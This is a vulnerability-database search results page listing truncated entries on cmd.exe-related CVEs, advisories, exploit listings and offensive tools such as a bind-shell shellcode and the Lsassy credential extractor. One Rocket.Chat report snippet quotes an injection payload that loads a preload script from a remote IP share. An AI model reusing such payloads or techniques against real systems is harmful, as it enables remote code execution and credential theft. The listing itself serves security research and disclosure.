Lucene search
K

208 matches found

Packet Storm
Packet Storm
added 2021/09/16 12:0 a.m.181 views

Microsoft Windows cmd.exe Stack Buffer Overflow

Credits: John Page aka hyp3rlinx, malvuln + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-CMD.EXE-STACK-BUFFER-OVERFLOW.txt + twitter.com/hyp3rlinx + ISR: ApparitionSec Vendor www.microsoft.com Product cmd.exe is the default command-line...

0.3AI score
Exploits0
NVD
NVD
added 2021/06/24 8:15 p.m.20 views

CVE-2021-35448

Emote Interactive Remote Mouse 3.008 on Windows allows attackers to execute arbitrary programs as Administrator by using the Image Transfer Folder feature to navigate to cmd.exe. It binds to local ports to listen for incoming connections...

7.8CVSS0.01045EPSS
Exploits2References3
Cvelist
Cvelist
added 2021/06/24 7:43 p.m.16 views

CVE-2021-35448

Emote Interactive Remote Mouse 3.008 on Windows allows attackers to execute arbitrary programs as Administrator by using the Image Transfer Folder feature to navigate to cmd.exe. It binds to local ports to listen for incoming connections...

8.1AI score0.01045EPSS
Exploits2References3
Prion
Prion
added 2021/06/10 4:15 p.m.20 views

Design/Logic Flaw

An unauthenticated attacker with physical access to a computer with NetSetMan Pro before 5.0 installed, that has the pre-logon profile switch button within the Windows logon screen enabled, is able to drop to an administrative shell and execute arbitrary commands as SYSTEM via the "save log to...

7.2CVSS6.9AI score0.00693EPSS
Exploits3References5Affected Software1
Github Security Blog
Github Security Blog
added 2021/05/20 4:50 p.m.50 views

Local directory executable lookup in sops (Windows-only)

Impact Windows users using the sops direct editor option sops file.yaml can have a local executable named either vi, vim, or nano executed if running sops from cmd.exe This attack is only viable if an attacker is able to place a malicious binary within the directory you are running sops from. As...

0.4AI score
Exploits0References2Affected Software1
GitLab Advisory Database
GitLab Advisory Database
added 2021/05/20 12:0 a.m.14 views

Local directory executable lookup in sops (Windows-only)

Impact Windows users using the sops direct editor option sops file.yaml can have a local executable named either vi, vim, or nano executed if running sops from cmd.exe This attack is only viable if an attacker is able to place a malicious binary within the directory you are running sops from. As...

0.4AI score
Exploits0References2Affected Software1
GithubExploit
GithubExploit
added 2021/05/05 8:22 a.m.21 views

Exploit for Improper Privilege Management in Microsoft

CVE-2019-1388 CVE-2019-1388 Abuse UAC Windows Certific...

7.8CVSS7.1AI score0.08589EPSS
Exploits7
Prion
Prion
added 2020/10/08 9:15 p.m.12 views

Code injection

LiveCode v9.6.1 on Windows allows local, low-privileged users to gain privileges by creating a malicious "cmd.exe" in the folder of the vulnerable LiveCode application. If the application is using LiveCode's "shell" function, it will attempt to search for "cmd.exe" in the folder of the current...

4.6CVSS7.7AI score0.00435EPSS
Exploits1References3Affected Software1
CVE
CVE
added 2020/10/08 8:4 p.m.65 views

CVE-2020-26894

Affected software: LiveCode v9.6.1 on Windows. Vulnerability: local privilege escalation via a malicious cmd.exe placed in the vulnerable app’s folder; when using LiveCode's shell(), the app may search that folder and execute cmd.exe. Root cause: insecure handling of an external executable in the...

7.8CVSS7.7AI score0.00435EPSS
Exploits1References3Affected Software1
Kitploit
Kitploit
added 2020/08/26 12:30 p.m.37 views

ezEmu - Simple Execution Of Commands For Defensive Tuning/Research

ezEmu enables users to test adversary behaviors via various execution techniques. Sort of like an "offensive framework for blue teamers ", ezEmu does not have any networking/C2 capabilities and rather focuses on creating local test telemetry. Windows See /Linux for ELF ezEmu is compiled as...

7.1AI score
Exploits0References2
Hacker One
Hacker One
added 2020/07/27 12:0 p.m.27 views

Rocket.Chat: Remote Code Execution in Rocket.Chat-Desktop

Description: Rocket.Chat-Desktop is vulnerable to remote code execution. An attacker is able to create new BrowserWindow instances with a malicious preload script. Releases Affected: Rocket.Chat-Desktop-Client: PWNED', '', 'nodeIntegration=true', 'preload=\\45.155.173.235\data\cmd.js'.join','...

1.3AI score
Exploits0
Packet Storm
Packet Storm
added 2020/07/27 12:0 a.m.251 views

Microsoft Windows Unsafe Handling Practices

Hi @ll, This multi-part post can be read even without a MIME-compliant program! Back in 2014, I reported a vulnerability in CreateProcess's handling of .cmd and .bat files that Microsoft fixed with MS14-019 alias MSKB 2922229 and assigned CVE-2014-0315: command lines with a batch script as first...

6.9CVSS0.3AI score0.14736EPSS
Exploits4
NVD
NVD
added 2020/06/01 7:15 a.m.21 views

CVE-2020-4019

The file editing functionality in the Atlassian Companion App before version 1.0.0 allows local attackers to have the app run a different executable in place of the app's cmd.exe via a untrusted search path vulnerability...

7.8CVSS7.5AI score0.00355EPSS
Exploits0References1
Prion
Prion
added 2020/06/01 7:15 a.m.14 views

Design/Logic Flaw

The file editing functionality in the Atlassian Companion App before version 1.0.0 allows local attackers to have the app run a different executable in place of the app's cmd.exe via a untrusted search path vulnerability...

4.4CVSS7.4AI score0.00355EPSS
Exploits0References1Affected Software1
0day.today
0day.today
added 2020/01/30 12:0 a.m.195 views

Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode (571 Bytes)

Shellcode Title: Windows/x86 - Dynamic Bind Shell + Null-Free Shellcode 571 Bytes Shellcode Author: Bobby Cooke Technique: PEB & Export Directory Table Tested On: Windows 10 Pro x86 10.0.18363 Build 18363 Shellcode Function: When executed, this shellcode creates a cmd.exe bind shell, using the...

7.1AI score
Exploits0
Kitploit
Kitploit
added 2020/01/16 8:30 p.m.189 views

Lsassy - Extract Credentials From Lsass Remotely

Python library to remotely extract credentials. This blog post explains how it works. You can check the wiki This library uses impacket project to remotely read necessary bytes in lsass dump and pypykatz to extract credentials. Requirements Python = 3.6 pypykatz = 0.3.0 impacket Installation From...

7.8AI score
Exploits0References7
exploitpack
exploitpack
added 2020/01/13 12:0 a.m.25 views

Microsoft Windows 10 build 1809 - Local Privilege Escalation (UAC Bypass)

Microsoft Windows 10 build 1809 - Local Privilege Escalation UAC Bypass Exploit Title: Microsoft Windows 10 - Local Privilege Escalation UAC Bypass Author: Nassim Asrir Date: 2019-01-10 Exploit Author: Nassim Asrir CVE: N/A Tested On: Windows 10Pro 1809 Vendor : https://www.microsoft.com Technica...

0.1AI score
Exploits0
GithubExploit
GithubExploit
added 2020/01/06 10:34 p.m.157 views

Exploit for Improper Privilege Management in Microsoft

CVE-20190-1215 ws2ifsl.sys UAF exploit for Windows 10 19H1 x64...

7.8CVSS6AI score0.19254EPSS
Exploits2
OSV
OSV
added 2019/10/16 8:15 p.m.14 views

CVE-2019-17664

NSA Ghidra through 9.0.4 uses a potentially untrusted search path. When executing Ghidra from a given path, the Java process working directory is set to this path. Then, when launching the Python interpreter via the "Ghidra Codebrowser Window Python" option, Ghidra will try to execute the cmd.exe...

7.8CVSS7.3AI score
Exploits0References1
CVE
CVE
added 2019/10/16 7:42 p.m.100 views

CVE-2019-17664

CVE-2019-17664 affects NSA Ghidra up to 9.0.4, where the Java process working directory is set to the user-provided path. When launching the Python interpreter from Ghidra CodeBrowser > Window > Python, Ghidra attempts to execute cmd.exe from that working directory due to a potentially untr...

7.8CVSS7.7AI score0.00429EPSS
Exploits0References1Affected Software1
Rows per page
Query Builder